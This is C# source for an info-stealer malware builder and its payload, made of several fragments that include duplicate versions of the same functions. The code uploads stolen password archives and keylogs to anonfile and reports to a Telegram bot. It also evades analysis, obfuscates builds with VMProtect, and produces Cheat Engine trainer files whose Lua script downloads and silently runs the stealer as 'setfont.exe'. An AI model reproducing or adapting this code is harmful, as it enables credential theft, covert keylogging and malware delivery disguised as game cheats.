/// <summary>
/// Send passwords and system info to telegram bot
/// </summary>
/// <param name="file">Archive with passwords</param>
public static void SendReport(string file)
{
Console.WriteLine("Sending passwords archive to anonfile");
string url = AnonFile.Upload(file, GetLatestMessageId() == -1);
File.Delete(file);
Console.WriteLine("Sending report to telegram");
SendSystemInfo(url);
Console.WriteLine("Report sent to telegram bot");
}
/// <summary>
/// Send passwords and system info to telegram bot
/// </summary>
/// <param name="file">Archive with passwords</param>
public static void SendReport(string file)
{
Logging.Log("Sending passwords archive to anonfile");
string url = AnonFile.Upload(file, GetLatestMessageId() == -1 && !AntiAnalysis.Run());
File.Delete(file);
Logging.Log("Sending report to telegram");
SendSystemInfo(url);
Logging.Log("Report sent to telegram bot");
}
/// <summary>
/// Upload keylogs to anonfile
/// </summary>
private static void UploadKeylogs()
{
string log = Path.Combine(Paths.InitWorkDir(), "logs");
if (!Directory.Exists(log))
{
return;
}
string filename = DateTime.Now.ToString("yyyy-MM-dd_h.mm.ss");
string archive = Filemanager.CreateArchive(log, false);
File.Move(archive, filename + ".zip");
string url = AnonFile.Upload(filename + ".zip");
File.Delete(filename + ".zip");
File.AppendAllText(KeylogsHistory, $"\t\t\t\t\t\t\t- " +
$"[{filename.Replace("_", " ").Replace(".", ":")}]({url})\n");
Startup.HideFile(KeylogsHistory);
}
public void compile(string path)
{
if (metroCheckBox4.Checked == true)
{
if (metroTextBox3.Text.Length > 45)
{
MessageBox.Show("Title too long!");
return;
}
if (metroTextBox4.Text.Length > 45)
{
MessageBox.Show("Message too long!");
return;
}
}
try { File.Delete(path); } catch { }
//[ID]==[WebHook_URL]==[Path]==[Tracer:(Y/N)]--[Recover:(Y/N)]--[GetAllAccs:(Y/N)]--[DeleteGT:(Y/N)]--[StartUp:(Y/N)]--[HideStealer:(Y/N)]--[BrowserCreds:(Y/N)]==[Title]==[Message]==[AAPData]
string command = "";
command += "[" + metroTextBox5.Text + "]==[" + path + "]==";
if (metroCheckBox9.Checked == true)
{
command += "[DisableProt:(Y)]--";
}
else
{
command += "[DisableProt:(N)]--";
}
if (metroCheckBox1.Checked == true)
{
command += "[Tracer:(Y)]--";
}
else
{
command += "[Tracer:(N)]--";
}
if (metroCheckBox10.Checked == true)
{
command += "[Recover:(Y)]--";
}
else
{
command += "[Recover:(N)]--";
}
if (metroCheckBox7.Checked == true)
{
command += "[GetAllAccs:(Y)]--";
}
else
{
command += "[GetAllAccs:(N)]--";
}
if (metroCheckBox5.Checked == true)
{
command += "[DeleteGT:(Y)]--";
}
else
{
command += "[DeleteGT:(N)]--";
}
if (metroCheckBox6.Checked == true)
{
command += "[StartUp:(Y)]--";
}
else
{
command += "[StartUp:(N)]--";
}
if (metroCheckBox2.Checked == true)
{
command += "[HideStealer:(Y)]--";
}
else
{
command += "[HideStealer:(N)]--";
}
if (metroCheckBox3.Checked == true)
{
command += "[BrowserCreds:(Y)]==";
}
else
{
command += "[BrowserCreds:(N)]==";
}
if (metroCheckBox4.Checked == true && metroTextBox3.Text != "" && metroTextBox4.Text != "")
{
command += "[" + metroTextBox3.Text + "]==[";
command += metroTextBox4.Text + "]==";
}
else
{
command += "[+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-]==[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-]==";
}
command += "[" + Get5RND() + "]--[" + Get9RND() + "]--[" + grab5keys() + "]--[" + grab9keys() + "]==";
try
{
command = command.Replace(" ", "[SPACE]");
}
catch { }
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.Arguments = "cmd /c Z-BuilderCL.exe " + command;
p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
p.StartInfo.WorkingDirectory = Directory.GetCurrentDirectory();
p.Start();
p.WaitForExit();
string StealerBasePath = Environment.ExpandEnvironmentVariables("%TEMP") + "\\StealerBase.exe";
try { File.Delete(StealerBasePath); } catch { }
if (metroCheckBox8.Checked == true)
{
using (AnonFileWrapper anonFileWrapper = new AnonFileWrapper())
{
AnonFile anonFile = anonFileWrapper.UploadFile(path);
string DownloadPath = anonFileWrapper.GetDirectDownloadLinkFromLink(anonFile.FullUrl);
string CetrainerCode = "function lolokieZ(boops)local beepboop = (5*3-2/8+9*2/9+8*3) end function lolokieZ(blahblah)local beepboop = (5*3-2/8+9*2/9+8*3) end local beepboop = (5*3-2/8+9*2/9+8*3) local url = '" + DownloadPath + "'local a= getInternet()local test = a.getURL(url)local location = os.getenv('TEMP')local file = io.open(location..'\\\\ZBCT.exe', 'wb')file:write(test)file:close()shellExecute(location..'\\\\ZBCT.exe')";
string path2 = Path.GetDirectoryName(path) + "\\" + Path.GetFileNameWithoutExtension(path) + ".CETRAINER";
File.WriteAllText(path2, "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<CheatTable CheatEngineTableVersion=\"29\">\n <CheatEntries/>\n <UserdefinedSymbols/>\n <LuaScript>\n" + CetrainerCode + "\n</LuaScript>\n</CheatTable>");
}
File.Delete(path);
MessageBox.Show("Stealer compiled!");
}
else
{
MessageBox.Show("Stealer compiled!");
}
}
public void compile(string path)
{
if (listView1.Items.Count > 0)
{
if (metroComboBox1.Text == "")
{
MessageBox.Show("Drop path required for binded files");
return;
}
}
string basecode = Properties.Resources.Code;
basecode = BuildBase(basecode);
List <string> code = new List <string>();
code.Add(basecode);
string manifest = @"<?xml version=""1.0"" encoding=""utf-8""?>
<assembly manifestVersion=""1.0"" xmlns=""urn:schemas-microsoft-com:asm.v1"">
<assemblyIdentity version=""1.0.0.0"" name=""MyApplication.app""/>
<trustInfo xmlns=""urn:schemas-microsoft-com:asm.v2"">
<security>
<requestedPrivileges xmlns=""urn:schemas-microsoft-com:asm.v3"">
<requestedExecutionLevel level=""highestAvailable"" uiAccess=""false"" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns=""urn:schemas-microsoft-com:compatibility.v1"">
<application>
</application>
</compatibility>
</assembly>
";
File.WriteAllText(Application.StartupPath + @"\manifest.manifest", manifest);
CodeDomProvider provider = CodeDomProvider.CreateProvider("CSharp");
CompilerParameters compars = new CompilerParameters();
compars.ReferencedAssemblies.Add("System.Net.dll");
compars.ReferencedAssemblies.Add("System.Net.Http.dll");
compars.ReferencedAssemblies.Add("System.dll");
compars.ReferencedAssemblies.Add("System.Windows.Forms.dll");
compars.ReferencedAssemblies.Add("System.Drawing.dll");
compars.ReferencedAssemblies.Add("System.Management.dll");
compars.ReferencedAssemblies.Add("System.IO.dll");
compars.ReferencedAssemblies.Add("System.IO.compression.dll");
compars.ReferencedAssemblies.Add("System.IO.compression.filesystem.dll");
compars.ReferencedAssemblies.Add("System.Core.dll");
compars.ReferencedAssemblies.Add("System.Security.dll");
compars.ReferencedAssemblies.Add("System.Diagnostics.Process.dll");
string tempPathForAntiDelete = @"C:\Temp\AntiDelete.exe";
try { File.Delete(tempPathForAntiDelete); } catch { }
File.WriteAllBytes(tempPathForAntiDelete, Properties.Resources.AntiDelete);
compars.EmbeddedResources.Add(tempPathForAntiDelete);
compars.GenerateExecutable = true;
string TempEXEPath = @"C:\Temp\" + Path.GetFileName(path);
try { File.Delete(TempEXEPath); } catch { }
compars.OutputAssembly = TempEXEPath;
compars.GenerateInMemory = false;
compars.TreatWarningsAsErrors = false;
compars.CompilerOptions += "/t:winexe /unsafe /platform:x86";
if (!string.IsNullOrEmpty(metroTextBox7.Text) || !string.IsNullOrWhiteSpace(metroTextBox7.Text) && metroTextBox7.Text.Contains(@"\") && metroTextBox7.Text.Contains(@":") && metroTextBox7.Text.Length >= 7)
{
compars.CompilerOptions += " /win32icon:" + @"""" + metroTextBox7.Text + @"""";
}
else if (string.IsNullOrEmpty(metroTextBox7.Text) || string.IsNullOrWhiteSpace(metroTextBox7.Text))
{
}
if (listView1.Items.Count > 0)
{
foreach (ListViewItem item in listView1.Items)
{
compars.EmbeddedResources.Add("" + item.SubItems[0].Text + "");
}
}
System.Threading.Thread.Sleep(100);
CompilerResults res = provider.CompileAssemblyFromSource(compars, code.ToArray());
if (res.Errors.Count > 0)
{
try
{
File.Delete(Application.StartupPath + @"\manifest.manifest");
}
catch { }
foreach (CompilerError ce in res.Errors)
{
MessageBox.Show(ce.ToString());
}
}
else
{
try
{
File.Delete(Application.StartupPath + @"\manifest.manifest");
}
catch { }
//Auto Obfuscation
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.WorkingDirectory = Path.GetDirectoryName(System.Reflection.Assembly.GetEntryAssembly().Location);
p.StartInfo.Arguments = "/C VMProtect_Con " + TempEXEPath + " " + path;
p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
p.Start();
p.WaitForExit();
//Auto Obfuscation End
File.Delete(TempEXEPath);
if (metroCheckBox8.Checked == true)
{
using (AnonFileWrapper anonFileWrapper = new AnonFileWrapper())
{
AnonFile anonFile = anonFileWrapper.UploadFile(path);
string DownloadPath = anonFileWrapper.GetDirectDownloadLinkFromLink(anonFile.FullUrl);
string CetrainerCode = "function lolokieZ(boops)local beepboop = (5*3-2/8+9*2/9+8*3) end function lolokieZ(blahblah)local beepboop = (5*3-2/8+9*2/9+8*3) end local beepboop = (5*3-2/8+9*2/9+8*3) local url = '" + DownloadPath + "'local a= getInternet()local test = a.getURL(url)local location = os.getenv('TEMP')local file = io.open(location..'\\\\setfont.exe', 'wb')file:write(test)file:close()shellExecute(location..'\\\\setfont.exe')";
string path2 = Path.GetDirectoryName(path) + "\\" + Path.GetFileNameWithoutExtension(path) + ".CETRAINER";
File.WriteAllText(path2, "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<CheatTable CheatEngineTableVersion=\"29\">\n <CheatEntries/>\n <UserdefinedSymbols/>\n <LuaScript>\n" + CetrainerCode + "\n</LuaScript>\n</CheatTable>");
}
File.Delete(path);
File.Delete(tempPathForAntiDelete);
MessageBox.Show("Stealer compiled!");
}
else
{
File.Delete(tempPathForAntiDelete);
MessageBox.Show("Stealer compiled!");
}
}
}
